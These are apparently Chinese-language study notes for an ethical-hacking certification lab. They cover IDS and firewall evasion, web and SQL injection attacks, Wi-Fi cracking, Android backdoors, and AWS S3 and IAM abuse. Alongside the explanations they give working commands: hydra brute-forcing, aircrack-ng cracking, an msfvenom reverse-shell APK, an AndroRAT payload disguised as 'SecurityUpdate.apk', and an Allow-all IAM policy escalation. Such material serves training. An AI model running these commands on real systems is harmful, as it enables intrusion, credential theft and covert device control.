Sequential Change-point Detection 順序變化點偵測:按 IP 位址、目標連接埠號碼和使用的通訊協定過濾網路流量,並將流量資料儲存在圖表中,顯示隨時間變化的流量速率
Wavelet-based Signal Analysis 基於小波的訊號分析:根據頻譜成分分析網路流量
使用 Anti DDoS Guardian 偵測並防禦 DDoS 攻擊:
Anti DDoS Guardian 是一款DDoS 攻擊防護工具。 它保護 IIS 伺服器、Apache 伺服器、遊戲伺服器、Camfrog 伺服器、郵件伺服器、FTP 伺服器、VOIP PBX 和 SIP 伺服器以及其他系統。 Anti DDoS Guardian 即時監控每個傳入和傳出的資料包。 它顯示每個網路流的本機位址、遠端位址和其他資訊。 Anti DDoS Guardian 限製網路流量、用戶端頻寬、用戶端並發 TCP 連線數、TCP 連線速率。 它還限制UDP頻寬、UDP連接速率和UDP封包速率。
Session Hijacking 會話劫持
會話劫持是指攻擊者接管兩台電腦之間的有效 TCP 通訊會話或 Web 應用程式中的有效使用者會話。
會話劫持攻擊是指利用會話令牌產生機製或令牌安全控制,使攻擊者能夠與目標伺服器建立未經授權的連線。 攻擊者猜測或竊取有效的會話 ID(用於標識經過身份驗證的使用者)並使用它與伺服器建立會話。
Active session hijacking 主動會話劫持:攻擊者發現活動會話並接管它
Passive session hijacking 被動會話劫持:攻擊者劫持會話,而不是接管,而是監視和記錄該會話中的所有流量
會話劫持可分為三個主要階段:
Tracking the Connection 追蹤連線:攻擊者使用網路嗅探器來追蹤受害者和主機,或使用 Nmap 等工具掃描網路以尋找具有易於預測的 TCP 序列的目標
Desynchronizing the Connection 去同步連線:當目標和主機之間的連線已建立,或穩定且沒有資料傳輸,或當伺服器的序號不等於客戶端的確認號(反之亦然)時,就會發生去同步狀態
Injecting the Attacker’s Packet 注入攻擊者的資料包:一旦攻擊者中斷了伺服器和目標之間的連接,他們就可以將資料注入網路或作為中間人主動參與,在目標和伺服器之間傳遞數據,同時讀取資料並隨意注入數據
有兩種主要方法可用於偵測會話劫持:
Manual Method手動方法:涉及使用Wireshark和SteelCentral Packet Analyzer等資料包嗅探軟體來監控會話劫持攻擊; 資料包嗅探器會擷取透過網路傳輸的資料包,然後使用各種過濾工具進行分析
Automatic Method自動方法:涉及使用入侵偵測系統(IDS)和入侵防禦系統(IPS)來監控傳入的網路流量; 如果封包與內部資料庫中的任何攻擊特徵匹配,IDS 會產生警報,IPS 會阻止流量進入資料庫
Evading IDS, Firewalls, and Honeypots逃避 IDS、防火牆和蜜罐
逃避 IDS 和防火牆涉及修改攻擊以逃避組織安全系統的偵測,而蜜罐則是設置陷阱來偵測、轉移或抵制未經授權的入侵嘗試。
IDS 為組織的基礎設施提供了額外的安全層,對於攻擊者來說是有吸引力的目標。 攻擊者實施各種 IDS 規避技術來繞過此安全機制並破壞基礎設施。 許多 IDS 規避技術透過多種方法規避檢測,並且可以適應每個系統的最佳方法。
防火牆按照一組預先定義的規則運作。 利用豐富的知識和技能,攻擊者可以透過採用各種繞過技術來繞過防火牆。 使用這些技術,攻擊者欺騙防火牆不過濾產生的惡意流量。
入侵偵測系統:
入侵偵測系統非常有用,因為它們監視網路的入站和出站流量,並持續檢查資料是否存在可能表明網路或系統安全漏洞的可疑活動。 IDS 檢查流量中是否有與已知入侵模式相符的簽名,並在偵測到匹配時發出警報。 根據其功能的不同,它可以分為主動式和被動式:IDS通常是被動式的,用於檢測入侵,而入侵防禦系統(IPS)則被視為主動式IDS,因為它不僅用於檢測入侵。對網路的入侵,還要防止它們。
IDS的主要功能:
收集並分析電腦或網路內的信息,以識別可能違反安全策略的行為
也稱為“資料包嗅探器”,它攔截沿著各種通訊介質和協定傳輸的資料包
評估流量是否有可疑入侵,並在偵測後發出警報
使用 Snort 偵測入侵:
Snort是一個開源網路入侵偵測系統,能夠在IP網路上執行即時流量分析和封包記錄。 它可以執行協定分析和內容搜尋/匹配,並用於檢測各種攻擊和探測,例如緩衝區溢位、隱形連接埠掃描、CGI 攻擊、SMB 探測和作業系統指紋識別嘗試。 它使用靈活的規則語言來描述要收集或通過的流量,以及利用模組化外掛架構的偵測引擎。
鼻息的用途:
直接資料包嗅探器,例如 tcpdump
封包記錄器(用於網路流量調試等)
網路入侵防禦系統
使用 ZoneAlarm 免費防火牆偵測惡意網路流量:
ZoneAlarm 免費防火牆阻止攻擊者和入侵者存取您的系統。 它管理和監控所有傳入和傳出流量,保護網路免受駭客、惡意軟體和其他使網路隱私面臨風險的線上威脅的侵害,並監控程式的可疑行為,發現並阻止繞過傳統防毒保護的新攻擊。 該防火牆透過保護您的資料來防止身分盜竊,並刪除您的痕跡,讓您在完全隱私的情況下上網衝浪。 此外,它還可以阻止攻擊者、阻止入侵,並使您的 PC 線上隱形。 此外,它還能過濾掉煩人且具有潛在危險的電子郵件。
使用 HoneyBOT 偵測惡意網路流量:
HoneyBOT 是 Windows 的中等互動蜜罐。 蜜罐創建了一個安全的環境來捕獲網路上未經請求的流量並與之互動。 HoneyBOT 是一種易於使用的解決方案,非常適合網路安全研究或作為預警 IDS 的一部分。
防火牆規避技術:
防火牆依照一組預先定義的規則運作。 利用豐富的知識和技能,攻擊者可以透過採用各種繞過技術來繞過防火牆。 使用這些技術,攻擊者欺騙防火牆不過濾他/她產生的惡意流量。
以下是一些防火牆繞過技術
Port Scanning 連接埠掃描
Firewalking
Banner Grabbing橫幅抓取
IP Address Spoofing IP位址欺騙
Source Routing 來源路由
Tiny Fragments 小碎片
Using an IP Address in Place of URL 使用 IP 位址代替 URL
Using Anonymous Website Surfing Sites 使用匿名網站衝浪網站
Using a Proxy Server 使用代理伺服器
ICMP Tunneling ICMP隧道
ACK Tunneling ACK隧道
HTTP Tunneling HTTP隧道
SSH Tunneling SSH隧道
DNS Tunneling DNS隧道
Through External Systems 透過外部系統
Through MITM Attac 透過中間人攻擊
Through Content 透過內容
Through XSS Attack透過XSS攻擊
使用 HTTP/FTP 隧道繞過防火牆規則:
HTTP 隧道技術允許攻擊者儘管受到防火牆的限制,仍可以執行各種 Internet 任務。 如果目標公司有一個公共 Web 伺服器,其連接埠 80 用於 HTTP 流量且未經過其防火牆過濾,則可以實施此方法。 此技術將資料封裝在 HTTP 流量(連接埠 80)內。 許多防火牆不會檢查 HTTP 封包的有效負載來確認其合法性,因此可以透過 TCP 連接埠 80 進行隧道流量。
HTTPort 允許使用者繞過 HTTP 代理,該代理會阻止 Internet 存取電子郵件、即時訊息、P2P 檔案共用、ICQ、新聞、FTP、IRC 等。這裡,配置 Internet 軟體,以便它連接到本地PC 就好像它是所需的遠端伺服器一樣; 然後 HTTPort 攔截該連線並透過代理程式透過隧道運行它。 HTTPort 可以在允許 HTTP 流量的代理程式或防火牆等裝置上工作。 因此,HTTPort 提供對網站和網路應用程式的存取。 HTTPort 使用以下兩種模式之一執行隧道:SSL/CONNECT 模式和遠端主機。
遠端主機方法能夠透過任何代理程式建立隧道。 HTTPort 使用名為 HTTHost 的特殊伺服器軟體,該軟體安裝在代理阻止的網路之外。 它是一個 Web 伺服器,因此當 HTTPort 進行隧道傳輸時,它會向 HTTHost 發送一系列 HTTP 請求。 代理會做出回應,就像使用者正在瀏覽網站一樣,從而允許使用者這樣做。 HTTHost 反過來執行其一半的隧道傳輸並與目標伺服器通訊。 這種模式速度慢得多,但在大多數情況下都有效,並且具有強大的資料加密功能,使代理日誌記錄毫無用處。
使用 Metasploit 模板繞過防毒軟體:
防毒軟體旨在偵測惡意進程或檔案並阻止其在端點上執行。 有多種技術可用於繞過防毒軟體並在目標電腦中執行惡意進程。
透過 Windows BITSAdmin 繞過防火牆:
BITS(背景智慧傳輸服務)是Windows XP 及更高版本的Windows 作業系統的重要元件。 系統管理員和程式設計師使用 BITS 從 HTTP Web 伺服器和 SMB 檔案共用下載檔案或將檔案上傳到 HTTP Web 伺服器和 SMB 檔案共用。 BITSAdmin 是一個用於建立下載或上傳作業並監控其進度的工具。
Hacking Web Servers
Web 伺服器是透過 HTTP 協定儲存、處理網頁並將網頁傳送給全球客戶端的電腦系統。 Web 伺服器攻擊通常涉及預先規劃的活動,稱為攻擊方法,攻擊者實施這些活動是為了達到破壞目標 Web 伺服器安全的目標。
Web伺服器概述:
大多數人認為網頁伺服器只是硬件,但網頁伺服器也包括軟體應用程式。一般情況下,客戶端透過HTTP請求發起通訊過程。當客戶端想要存取任何資源(例如網頁、照片或影片)時,客戶端的瀏覽器會向 Web 伺服器產生 HTTP 請求。根據請求,Web 伺服器從資料儲存或應用程式伺服器收集請求的資訊或內容,並使用適當的 HTTP 回應來回應客戶端的請求。如果 Web 伺服器無法找到所要求的訊息,則會產生錯誤訊息。
Web 伺服器佔用空間:
透過執行 Web 伺服器足跡,可以收集有價值的系統級數據,例如帳戶詳細資訊、作業系統、軟體版本、伺服器名稱和資料庫架構詳細資訊。使用 Telnet 實用程式追蹤 Web 伺服器並收集伺服器名稱、伺服器類型、作業系統和正在運行的應用程式等資訊。使用 Netcraft、ID Serve 和 httprecon 等足跡工具來執行 Web 伺服器足跡。 Netcraft、ID Serve 和 httprecon 等 Web 伺服器足跡工具可以從目標伺服器提取資訊。讓我們看看這些工具可以從目標伺服器收集的資訊的功能和類型。
使用鬼眼收集資訊:
Ghost Eye是一個用Python 3編寫的資訊收集工具。 Ghost Eye 可以與任何支援 Python 3 的 Linux 發行版搭配使用。
Ghost Eye 收集 Whois 查找、DNS 查找、EtherApe、Nmap 連接埠掃描、HTTP 標頭抓取器、點擊劫持測試、Robots.txt 掃描器、連結抓取器、IP 位置查找器和追蹤路由等資訊。
使用 Skipfish 執行 Web 伺服器偵察:
Skipfish 是一個活躍的 Web 應用程式(部署在網路伺服器上)安全偵察工具。它透過執行遞歸爬行和基於字典的探測來為目標站點準備互動式網站地圖。然後,生成的地圖會使用許多活動(但希望不會造成破壞)安全檢查的輸出進行註釋。該工具產生的最終報告旨在作為專業 Web 應用程式安全評估的基礎。
使用 httprecon 工具追蹤 Web 伺服器:
Web 應用程式可以發布資訊、與 Internet 使用者互動以及建立電子商務或電子政府。然而,如果一個組織在配置和經營其公共網站方面不嚴格,則可能容易受到各種安全威脅。儘管網路空間中的威脅與現實世界中的威脅基本相同(詐欺、盜竊、破壞和恐怖主義),但它們危險得多。如果入侵者成功侵犯了組織的資料機密性,組織可能會面臨金錢損失、聲譽受損和法律訴訟。
httprecon 是一個用於進階 Web 伺服器指紋識別的工具。該工具在其目標 Web 伺服器上執行橫幅抓取攻擊、狀態代碼枚舉和標頭排序分析。
使用字典攻擊破解 FTP 憑證:
字典或單字清單包含數千個單詞,密碼破解工具使用這些單字來闖入受密碼保護的系統。攻擊者可以透過猜測手動破解密碼,也可以使用自動化工具和技術(例如字典法)。大多數密碼破解技術都是成功的,因為密碼較弱或容易猜到。
hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt -P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://[Windows 11 的 IP 位址]
Hacking Web Applications
駭客網路應用程式是指未經授權存取網站或其相關資料。
Web 應用程式概述:
Web 應用程式透過在伺服器端產生的一組網頁或包含要在客戶端 Web 瀏覽器中動態執行的腳本程式碼的網頁,在最終使用者和 Web 伺服器之間提供介面。
Web應用程式在網頁瀏覽器上執行,並使用一組伺服器端腳本(例如ASP和PHP)和用戶端腳本(例如HTML和JavaScript)來執行應用程式。 Web 應用程式的工作取決於其架構,其中包括執行讀取請求、搜尋、收集和顯示所需資料等任務的硬體和軟體。
透過足跡網路基礎設施,攻擊者可以執行以下任務:
伺服器發現:攻擊者嘗試使用 Whois 查找、DNS 詢問和連接埠掃描等技術來發現託管 Web 應用程式的實體伺服器
服務發現:攻擊者發現 Web 伺服器上執行的服務,以確定他們是否可以使用其中一些服務作為攻擊 Web 應用程式的攻擊路徑
伺服器識別:攻擊者利用橫幅抓取來取得伺服器橫幅;這有助於識別 Web 伺服器軟體的品牌和版本
隱藏內容發現:足跡還允許攻擊者提取未直接連結到主要可見內容或無法從主要可見內容存取的內容和功能
使用 WhatWeb 執行 Web 應用程式偵察:
WhatWeb 識別網站並識別網路技術,包括內容管理系統 (CMS)、部落格平台、統計和分析套件、JavaScript 程式庫、網頁伺服器和嵌入式設備。它還可以識別版本號、電子郵件地址、帳戶 ID、Web 框架模組、SQL 錯誤等。
使用 OWASP ZAP 執行網路爬取:
OWASP Zed Attack Proxy (ZAP) 是一種整合式滲透測試工具,用於尋找 Web 應用程式中的漏洞。它提供自動掃描程序以及一組允許您手動查找安全漏洞的工具。 ZAP 提供了適合各種技能等級的功能——從開發人員到剛接觸安全測試的測試人員,再到安全測試專家。
使用各種工具檢測負載平衡器:
組織使用負載平衡器將 Web 伺服器負載分配到多個伺服器上,並提高 Web 應用程式的生產力和可靠性。一般來說,負載平衡器有兩種類型,即DNS負載平衡器(四層負載平衡器)和http負載平衡器(七層負載平衡器)。您可以使用各種工具(例如 dig 和負載平衡偵測器 (lbd))來偵測目標組織的負載平衡器及其真實 IP 位址。
gobuster dir -u [目標網站] -w /home/attacker/Desktop/common.txt
python3 dirsearch.py -u http://www.moviescope.com
使用 PwnXSS 識別 Web 應用程式中的 XSS 漏洞:
PwnXSS 是一款開源 XSS 掃描程序,用於偵測網站中的跨站腳本 (XSS) 漏洞。它是一個用Python語言編寫的多處理和可自訂的工具。
python3 pwnxss.py -u http://testphp.vulnweb.com
執行跨站請求偽造 (CSRF) 攻擊:
CSRF,也稱為一鍵攻擊,當駭客指示使用者的網路瀏覽器透過惡意網頁向易受攻擊的網站發送請求時,就會發生這種情況。金融網站通常存在 CSRF 漏洞。通常,外部攻擊者無法存取企業內網,因此 CSRF 是進入這些網路的方法之一。 Web 應用程式無法區分使用惡意程式碼發出的請求和真實請求,從而使其面臨 CSRF 攻擊。這些攻擊利用網頁漏洞,讓攻擊者迫使毫無戒心的使用者的瀏覽器發送他們無意的惡意請求。
wpscan --api-token [API 令牌] --url http://10.10.1.22:8080/CEH --plugins-detectionaggressive --enumerate vp
– enumerate vp:指定易受攻擊的插件的枚舉。
SQL Injection
SQL 注入是一種利用輸入漏洞透過 Web 應用程式傳遞惡意 SQL 命令以供後端資料庫執行的技術。
SQL注入概述:
SQL 注入攻擊可以使用各種技術來執行,以查看、操作、插入和刪除應用程式資料庫中的資料。 SQL注入主要分為三種:
In-band SQL injection:攻擊者使用相同的通訊通道來執行攻擊並檢索結果
Blind/inferential SQL injection:攻擊者無法從系統中獲取可操作的錯誤訊息,而只是向資料庫發送惡意 SQL 查詢
Out-of-band SQL injection:攻擊者使用不同的通訊管道(例如資料庫電子郵件功能,或檔案寫入和載入功能)來執行攻擊並取得結果
SQL注入可用來實作下列攻擊:
身份驗證繞過:攻擊者在不提供有效使用者名稱和密碼的情況下登入應用程式並獲得管理權限
授權繞過:攻擊者利用SQL注入漏洞更改資料庫中儲存的授權信息
資訊外洩:攻擊者獲取資料庫中儲存的敏感信息
資料完整性受損:攻擊者破壞網頁、將惡意內容插入網頁或更改資料庫的內容
資料可用性受損:攻擊者刪除資料庫中的特定資訊、日誌或審核訊息
遠端程式碼執行:攻擊者遠端執行一段可能危及主機作業系統的程式碼
sqlmap 是一個開源滲透測試工具,可以自動執行檢測和利用 SQL 注入缺陷以及接管資料庫伺服器的過程。它配備了強大的檢測引擎、許多利基功能和廣泛的開關 - 從資料庫指紋識別和從資料庫獲取資料到存取底層檔案系統並透過帶外連接在作業系統上執行命令。
您可以使用 sqlmap 使用各種技術對目標網站執行 SQL 注入,包括基於布林的盲注、基於時間的盲注、基於錯誤、基於 UNION 查詢、堆疊查詢和帶外 SQL 注入。
使用 DSSS 檢測 SQL 注入漏洞:
Damn Small SQLi Scanner (DSSS) 是一個功能齊全的 SQL 注入漏洞掃描器,支援 GET 和 POST 參數。 DSSS 掃描 Web 應用程式是否存在各種 SQL 注入漏洞。
Hacking Wireless Networks
無線網路是一種無邊界的資料通訊系統,利用射頻技術與設備進行通訊並取得資料。透過射頻技術,Wi-Fi 可讓裝置從接入點範圍內的任何地方無需電纜即可存取無線網路。無線網路可能面臨各種類型的攻擊,包括存取控制攻擊、完整性攻擊、機密性攻擊、可用性攻擊和身分驗證攻擊。
無線網路概論:
在無線網路中,通訊透過無線電波傳輸進行,通常發生在網路結構的實體層。由於無線通訊革命,數據網路和電信正在發生根本性變化。這意味著您需要了解並理解幾種類型的無線網路。這些包括:
擴展到有線網路:透過在有線網路和無線設備之間引入存取點來擴展有線網路
多個存取點:多個存取點無線連接電腦
LAN到LAN無線網路:所有硬體AP都能夠與其他硬體接入點互連
3G/4G 熱點:行動裝置與支援 Wi-Fi 的裝置(例如 MP3 播放器、筆記型電腦、平板電腦、相機、PDA 和上網本)無線共享其蜂窩數據
無線流量分析概論:
無線流量分析有助於確定成功攻擊的適當策略。 Wi-Fi 協定在第 2 層是獨一無二的,空中傳輸的流量不是序列化的,這使得嗅探和分析無線資料包變得容易。您可以使用各種 Wi-Fi 封包嗅探工具來擷取和分析目標無線網路的流量。
攻擊者可以使用多種不同類型的 Wi-Fi 攻擊來竊聽無線網路連接,以獲取密碼、銀行憑證和醫療記錄等敏感訊息,並傳播惡意軟體。
這些包括:
Fragmentation attack 碎片攻擊:成功後,此類攻擊可以獲得1,500位元組的PRGA(偽隨機產生演算法)
MAC spoofing attack MAC 欺騙攻擊:攻擊者將其 MAC 位址變更為經過驗證的使用者的位址,以繞過存取點的 MAC 過濾配置
Disassociation attack 解除關聯攻擊:攻擊者透過破壞存取點和用戶端之間的連接,使受害者無法使用其他無線設備
Deauthentication attack 解除身分驗證攻擊:攻擊者以偽造的解除身分驗證封包淹沒站點,以中斷使用者與存取點的連接
Man-in-the-middle attack 中間人攻擊:一種主動的網路攻擊,攻擊者試圖攔截、讀取或更改兩台電腦之間的訊息
Wireless ARP poisoning attack 無線ARP中毒攻擊:利用ARP協定中缺乏驗證機制的攻擊技術,透過破壞作業系統維護的ARP緩存,將攻擊者的MAC位址與目標主機關聯起來
Rogue access points 惡意存取點:攻擊者未經授權在網路上安裝且不受網路管理員管理的無線存取點
Evil twin:詐騙無線存取點,透過模仿另一個網路名稱來冒充合法存取點
Wi-Jacking 攻擊:攻擊者用來取得大量無線網路存取權限的方法
使用 Aircrack-ng 破解 WEP 網路:
Aircrack-ng 是一款網路軟體套件,包含用於 802.11 無線網路的偵測器、資料包嗅探器、WEP 和 WPA/WPA2-PSK 破解器和分析工具。該程式可以在 Linux 和 Windows 上運行。
aircrack-ng '/home/attacker/Desktop/Sample Captures/WEPcrack-01.cap'
使用 Aircrack-ng 破解 WPA2 網路:
WPA2是WPA的升級;它強制支援具有密碼塊鏈訊息驗證代碼協議 (CCMP) 的計數器模式,CCMP 是一種基於 AES 的加密協議,具有很強的安全性。 WPA2 有兩種操作模式:WPA2-個人和 WPA2-企業。儘管比 WEP 和 WPA 更強大,但 WPA2 加密方法也可以使用各種技術和工具進行破解。
aircrack-ng -a2 -b [目標 BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap'
-a是用來破解握手的技術,2=WPA技術。
-b 指bssid;替換為目標路由器的 BSSID。
-w 代表單字表;提供單字列表的路徑。
-> 解密 wifi 流量:Wireshark > 編輯 > 首選項 > 協定 > IEEE 802.11 > 新增 WPA 金鑰(密碼)
行動裝置可讓使用者之間透過無線電頻率進行通信,無論是 GSM、LTE、5G 或 Wi-Fi。它們可用於傳送多媒體內容、電子郵件以及使用 Internet 執行更多任務。隨著使用多種攻擊媒介危害行動裝置的複雜攻擊的出現,行動安全變得越來越具有挑戰性。這些安全威脅利用行動用戶的關鍵數據以及財務資訊和其他詳細信息,也可能損害行動網路和組織的聲譽。
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.1.13 R > Desktop/Backdoor.apk
使用 PhoneSploit 透過 ADB 利用 Android 平台:
Android 偵錯橋接器 (ADB) 是一種多功能命令列工具,可讓您與裝置進行通訊。 ADB 促進各種設備操作,例如安裝和偵錯應用程序,並提供對 Unix shell 的訪問,您可以使用該 shell 在設備上執行多個不同的命令。
通常,開發人員使用 USB 連接線連接到 Android 裝置上的 ADB,但也可以透過在裝置上的 TCP 連接埠 5555 啟用守護程式伺服器來無線連線。
透過使用 AndroRAT 建立 APK 檔案來破解 Android 裝置:
AndroRAT 是一款旨在將 Android 系統的控制權交給遠端使用者並從中檢索資訊的工具。 AndroRAT 是一個客戶端/伺服器應用程序,使用 Java Android 為客戶端開發,伺服器使用 Python 語言。 AndroRAT 為目標裝置提供完全持久的後門,因為應用程式會在裝置啟動時自動啟動,它還會取得裝置的目前位置、SIM 卡詳細資料、IP 位址和 MAC 位址。
python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk
– build:用於建構APK
-i:指定本機IP位址(此處為10.10.1.13)
-p:指定連接埠號碼(此處為4444)
-o:指定輸出APK檔案(此處為SecurityUpdate.apk)
python3 androRAT.py --shell -i 0.0.0.0 -p 4444
https://www.sisik.eu/apk-tool
使用 Malwarebytes Security 保護 Android 裝置免受惡意應用程式的侵害
Malwarebytes 是一款反惡意軟體行動工具,可針對惡意軟體、勒索軟體和其他針對 Android 裝置的日益增長的威脅提供防護。它可以阻止、偵測和刪除廣告軟體和惡意軟體;對所有應用程式進行隱私審核;並確保更安全的瀏覽。
IoT and OT Hacking
IoT 和 OT 設備駭客攻擊的目的是危害閉路電視攝影機、汽車、印表機、門鎖、洗衣機等智慧型設備,以獲得對網路資源以及 IoT 和 OT 設備的未經授權的存取。
利用物聯網和OT駭客方法,攻擊者透過資訊收集、攻擊面識別、漏洞掃描等技術獲取訊息,並利用這些資訊對目標設備和網路進行駭客攻擊。
MQTT 協定是一種機器對機器 (M2M)/「物聯網」連線協定。它對於與需要較小程式碼佔用空間和/或網路頻寬非常寶貴的遠端位置的連接非常有用。
以下是物聯網和 OT 設備駭客攻擊的各個階段:
Information gathering 資訊收集
Vulnerability scanning 漏洞掃描
Launch attacks 發動攻擊
Gain remote access 獲得遠端存取
Maintain access 保持存取權限
使用線上足跡工具收集信息
IoT 和 OT 流量概述
許多物聯網設備(例如安全攝影機)託管用於從遠端位置控製或配置攝影機的網站。這些網站大多採用不安全的HTTP協議,而非安全的HTTPS協議,因此容易受到各種攻擊。如果攝影機使用預設的工廠憑證,攻擊者可以輕鬆攔截攝影機和 Web 應用程式之間的所有流量,並進一步獲得對攝影機本身的存取權限。攻擊者可以使用 Wireshark 等工具攔截此類流量並解密目標網路的 Wi-Fi 金鑰。
Cloud Computing雲端運算
雲端運算透過網際網路提供各種類型的服務和應用程式。這些服務使用戶能夠在遠端位置使用第三方管理的軟體和硬體。一些知名的雲端服務供應商是Google、亞馬遜和微軟。
雲端運算概述
雲端運算是指 IT 功能的按需交付,其中 IT 基礎設施和應用程式透過網路作為計量服務提供給訂閱者。雲端服務分為三類,即基礎設施即服務(IaaS)、平台即服務(PaaS)和軟體即服務(SaaS),它們提供了不同的開發雲端技術。
使用lazys3枚舉S3儲存桶
-lazys3 是一個 Ruby 腳本工具,用於使用不同的排列來暴力破解 AWS S3 儲存桶。此工具可取得可公開存取的S3儲存桶,還可讓您透過輸入公司名稱搜尋特定公司的S3儲存桶。
使用 S3Scanner 列舉 S3 儲存桶
S3Scanner 是一種尋找開啟的 S3 儲存桶並轉儲其內容的工具。它採用要檢查的儲存桶名稱清單作為其輸入。找到的 S3 儲存桶將輸出到檔案中。該工具也會在本地轉儲或列出「開啟」儲存桶的內容。
python3 ./s3scanner.py site.txt
轉儲所有開啟的儲存桶並將開啟和關閉的儲存桶記錄在found.txt中:
python3 ./s3scanner.py --include-close --out-filefound.txt --dump names.txt
只需在預設輸出檔案 (buckets.txt) 中記錄開啟的儲存桶:
python3 ./s3scanner.py 名稱.txt
將所有開啟的儲存桶的檔案清單儲存到檔案中:
python ./s3scanner.py --list 名稱.txt
S3 儲存桶供客戶和最終用戶用來儲存文字文件、PDF、影片、圖像等。
下面列出了可用於識別 AWS S3 儲存桶的幾種技術:
檢查 HTML:在背景分析 HTML 網頁的原始程式碼以尋找目標 S3 儲存桶的 URL
暴力破解 URL:使用 Burp Suite 對目標儲存桶的 URL 進行暴力攻擊,以識別其正確的 URL
尋找子網域:使用Findsubdomains和Robtex等工具識別與目標桶相關的子域名
反向IP搜尋:使用Bing等搜尋引擎進行反向IP搜索,以識別目標S3儲存桶的域
進階 Google 駭客攻擊:使用進階 Google 搜尋運算子(例如「inurl」)搜尋與目標 S3 儲存桶相關的 URL
使用 AWS CLI 利用開放式 S3 儲存桶
AWS 命令列介面 (CLI) 是用於管理 AWS 服務的統一工具。只需下載和設定工具,您就可以從命令列控制多個 AWS 服務,並透過腳本自動化。
aws 設定
它將要求提供以下詳細資訊:
AWS 存取金鑰 ID
AWS 秘密存取金鑰
預設區域名稱
預設輸出格式
aws s3 ls s3://[儲存桶名稱]
aws s3 mv Hack.txt s3://certifiedhacker1
aws s3 rm s3://certifiedhacker1/Hack.txt
權限提升概述
權限是指派給使用者使用特定程式、特性、作業系統、功能、檔案、程式碼等的安全角色,以根據使用者類型限制存取。當您想要存取無權存取的系統資源時,需要提權。它以兩種形式發生:垂直和水平。
水平權限提升:未經授權的使用者嘗試存取具有類似存取權限的授權使用者的資源、功能和其他權限
垂直權限升級:未經授權的使用者嘗試存取具有更高權限的使用者(例如應用程式或網站管理員)的資源和功能
利用錯誤配置的使用者策略升級 IAM 使用者權限
策略是一個實體,當附加到身分或資源時,定義其權限。您可以使用 AWS 管理主控台、AWS CLI 或 AWS API 在 IAM 中建立客戶管理的政策。客戶管理的策略是您在 AWS 帳戶中管理的獨立策略。然後,您可以將政策附加到您的 AWS 帳戶中的身分(使用者、群組和角色)。如果使用者政策配置不正確,攻擊者可能會利用它們來獲得對目標使用者 AWS 帳戶的完全管理員存取權。
aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json
{
"Version" : "2012-10-17" ,
"Statement" : [
{
"Effect" : "Allow" ,
"Action" : "*" ,
"Resource" : "*"
}
]
}
aws iam Attach-user-policy --user-name [目標使用者名稱] --policy-arn arn:aws:iam::[帳號 ID]:policy/user-policy
aws iam list-attached-user-policies --user-name [目標使用者名稱]
- aws iam 列表使用者
S3 儲存桶清單: aws s3api list-buckets --query "Buckets[].Name"
User Policies使用者策略: aws iam list-user-policies
Role Policies角色策略: aws iam list-role-policies
Group policies群組原則: aws iam list-group-policies
Create user 建立使用者: aws iam create-user
Cryptography Serpent 是一種區塊加密演算法,區塊大小為 128 Bit,密鑰長度可達 256 Bit。具有高安全性、良好效能和可移植性,廣泛應用於安全應用中。
TEA 是 Tiny Encryption Algorithm 的縮寫,區塊大小為 64 Bit,密鑰長度為 128 Bit。簡單、高效、易於實現,但安全性較弱,容易受到差分攻擊等攻擊手段影響。
CAST-128 是一種對稱式區塊加密演算法,區塊大小為 64 Bit,密鑰長度為 40 至 128 Bit。採用了Feistel網路結構和多輪加密,被廣泛用於安全應用程式中,但仍有一些安全風險存在。
GOST Block Cipher,又稱 GOST 28147-89,區塊大小為 64 Bit,密鑰長度為 256 Bit。採用了Feistel網路結構和8輪迭代加密,具有高強度和良好性能,廣泛應用於俄羅斯的安全標準中。
Camellia 是雙線性加密算法,區塊大小為 128 Bit,密鑰長度可達 256 Bit。採用了Feistel網路結構,被廣泛應用於安全協議和軟體的加密和認證中,安全性與AES相當。
DSA 是數位簽章演算法,用於數位簽章和驗證。基於離散對數難題,安全性高且效率較高,在SSL、TLS等協議中廣泛應用。
Diffie-Hellman 是一種公開金鑰演算法,用於安全地在不安全網路上進行密鑰交換,基於離散對數問題,安全性高且算法簡單,適用於各種加密協議。
HMAC 是基於Hash函數和密鑰的訊息驗證碼算法,用於確保訊息完整性和來源驗證。具體原理包括選擇適當的Hash函數、使用密鑰進行Hash計算、生成HMAC等步驟。
ECB 模式是對稱加密的分組密碼模式,將明文分成固定大小的區塊,每個區塊獨立加密,安全性較差,容易受到密碼分析攻擊。
CBC 模式是對稱加密的分組密碼模式,每個區塊依賴於前一個區塊的加密結果,增強了數據的隨機性和安全性,適用於大規模數據加密。
Padding Oracle 攻擊是針對使用填充方式漏洞的加密系統的攻擊方法,常見於使用CBC模式且填充不正確的加密實現中。
前向保密(Forward Secrecy,FS)指通訊協定中過去的密鑰泄漏不會影響已傳輸資料的安全性,增強了安全通信的保密性。